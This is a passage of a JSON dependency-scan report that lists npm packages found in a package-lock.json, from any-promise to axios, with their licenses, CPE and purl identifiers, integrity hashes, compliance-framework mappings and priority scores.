], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:any-promise:any-promise:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:any-promise:any_promise:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:any_promise:any-promise:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:any_promise:any_promise:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:any:any-promise:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:any:any_promise:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/any-promise@1.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/any-promise/-/any-promise-1.3.0.tgz", "integrity": "sha512-7UvmKalWRt1wgjL1RrGxoSJW/0QZFIegpeGvZG9kjp8vrRu55XTHbwnqq2GpXm9uLbcuhxm3IqX9OB4MZR1b2A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4e58783cc9de2b91", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: anymatch 3.1.3", "title": "anymatch 3.1.3", "description": "Package discovered: anymatch 3.1.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0f1f6d6adbfca65a", "name": "anymatch", "version": "3.1.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:jonschlinkert:anymatch:3.1.3:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/anymatch@3.1.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", "dependencies": { "normalize-path": "^3.0.0", "picomatch": "^2.0.4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c5e1f2e50730714b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: append-field 1.0.0", "title": "append-field 1.0.0", "description": "Package discovered: append-field 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "02ed6bf0c016d0d3", "name": "append-field", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:append-field:append-field:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:append-field:append_field:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:append_field:append-field:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:append_field:append_field:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:append:append-field:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:append:append_field:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/append-field@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/append-field/-/append-field-1.0.0.tgz", "integrity": "sha512-klpgFSWLW1ZEs8svjfb7g4qWY0YS5imI82dTg+QahUvJ8YqAY0P10Uk8tTyh9ZGuYEZEMaeJYCF5BFuX552hsw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "413f489faf894e63", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: arg 5.0.2", "title": "arg 5.0.2", "description": "Package discovered: arg 5.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c190b80836cef557", "name": "arg", "version": "5.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:arg:arg:5.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/arg@5.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/arg/-/arg-5.0.2.tgz", "integrity": "sha512-PYjyFOLKQ9y57JvQ6QLo8dAgNqswh8M1RMJYdQduT6xbWSgK36P/Z/v+p888pM69jMMfS8Xd8F6I1kQ/I9HUGg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0ee2786b2f8f8ad4", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: array-flatten 1.1.1", "title": "array-flatten 1.1.1", "description": "Package discovered: array-flatten 1.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f61b69e470287928", "name": "array-flatten", "version": "1.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:array-flatten:array-flatten:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:array-flatten:array_flatten:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:array_flatten:array-flatten:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:array_flatten:array_flatten:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:array:array-flatten:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:array:array_flatten:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/array-flatten@1.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz", "integrity": "sha512-PCVAQswWemu6UdxsDFFX/+gVeYqKAod3D3UVm91jHwynguOwAvYPhx8nNlM++NqRcK6CxxpUafjmhIdKiHibqg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "374f7e7db72708e5", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: arrify 2.0.1", "title": "arrify 2.0.1", "description": "Package discovered: arrify 2.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e733388ffa39ebc5", "name": "arrify", "version": "2.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:arrify:arrify:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/arrify@2.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/arrify/-/arrify-2.0.1.tgz", "integrity": "sha512-3duEwti880xqi4eAMN8AyR4a0ByT90zoYdLlevfrvU43vb0YZwZVfxOgxWrLXXXpyugL0hNZc9G6BiB5B3nUug==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e3ccd8258c57c2f8", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: async-retry 1.3.3", "title": "async-retry 1.3.3", "description": "Package discovered: async-retry 1.3.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3f1747f861c5fded", "name": "async-retry", "version": "1.3.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:async-retry:async-retry:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:async-retry:async_retry:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:async_retry:async-retry:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:async_retry:async_retry:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:async:async-retry:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:async:async_retry:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/async-retry@1.3.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/async-retry/-/async-retry-1.3.3.tgz", "integrity": "sha512-wfr/jstw9xNi/0teMHrRW7dsz3Lt5ARhYNZ2ewpadnhaIp5mbALhOAP+EAdsC7t4Z6wqsDVv9+W6gm1Dk9mEyw==", "dependencies": { "retry": "0.13.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c5b9a7358fc490f2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: asynckit 0.4.0", "title": "asynckit 0.4.0", "description": "Package discovered: asynckit 0.4.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3f371bd1625a90e5", "name": "asynckit", "version": "0.4.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:asynckit:asynckit:0.4.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/asynckit@0.4.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b5ad0267f42a44eb", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: autoprefixer 10.5.0", "title": "autoprefixer 10.5.0", "description": "Package discovered: autoprefixer 10.5.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9d0845c4768cfcf5", "name": "autoprefixer", "version": "10.5.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:autoprefixer:autoprefixer:10.5.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/autoprefixer@10.5.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.5.0.tgz", "integrity": "sha512-FMhOoZV4+qR6aTUALKX2rEqGG+oyATvwBt9IIzVR5rMa2HRWPkxf+P+PAJLD1I/H5/II+HuZcBJYEFBpq39ong==", "dependencies": { "browserslist": "^4.28.2", "caniuse-lite": "^1.0.30001787", "fraction.js": "^5.3.4", "picocolors": "^1.1.1", "postcss-value-parser": "^4.2.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fba99cf19e7cc071", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: axios 1.15.2", "title": "axios 1.15.2", "description": "Package discovered: axios 1.15.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "691f5259c0d155d0", "name": "axios", "version": "1.15.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:axios:axios:1.15.2:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/axios@1.15.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/axios/-/axios-1.15.2.tgz", "integrity": "sha512-wLrXxPtcrPTsNlJmKjkPnNPK2Ihe0hn0wGSaTEiHRPxwjvJwT3hKmXF4dpqxmPO9SoNb2FsYXj/xEo0gHN+D5A==", "dependencies": { "follow-redirects": "^1.15.11", "form-data": "^4.0.5", "proxy-from-env": "^2.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, 